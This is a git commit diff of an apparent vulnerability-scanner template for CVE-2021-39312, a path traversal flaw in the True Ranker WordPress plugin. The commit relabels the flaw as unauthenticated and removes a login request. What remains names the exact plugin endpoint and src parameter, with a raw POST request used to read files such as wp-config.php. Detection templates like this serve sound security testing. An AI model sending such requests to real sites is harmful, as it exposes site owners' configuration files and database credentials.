Update CVE-2021-39312.yaml
parent
7ee380cb9e
commit
101f0e4607
|
@ -1,7 +1,7 @@
|
||||||
id: CVE-2021-39312
|
id: CVE-2021-39312
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: True Ranker < 2.2.4 - Authenticated Arbitrary File Access via Path Traversal
|
name: True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
|
||||||
author: DhiyaneshDK
|
author: DhiyaneshDK
|
||||||
severity: high
|
severity: high
|
||||||
description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
|
description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file.
|
||||||
|
@ -13,14 +13,6 @@ info:
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
|
||||||
POST /wp-login.php HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Origin: {{RootURL}}
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
||||||
|
|
||||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
||||||
- |
|
- |
|
||||||
POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
|
POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
Loading…
Reference in New Issue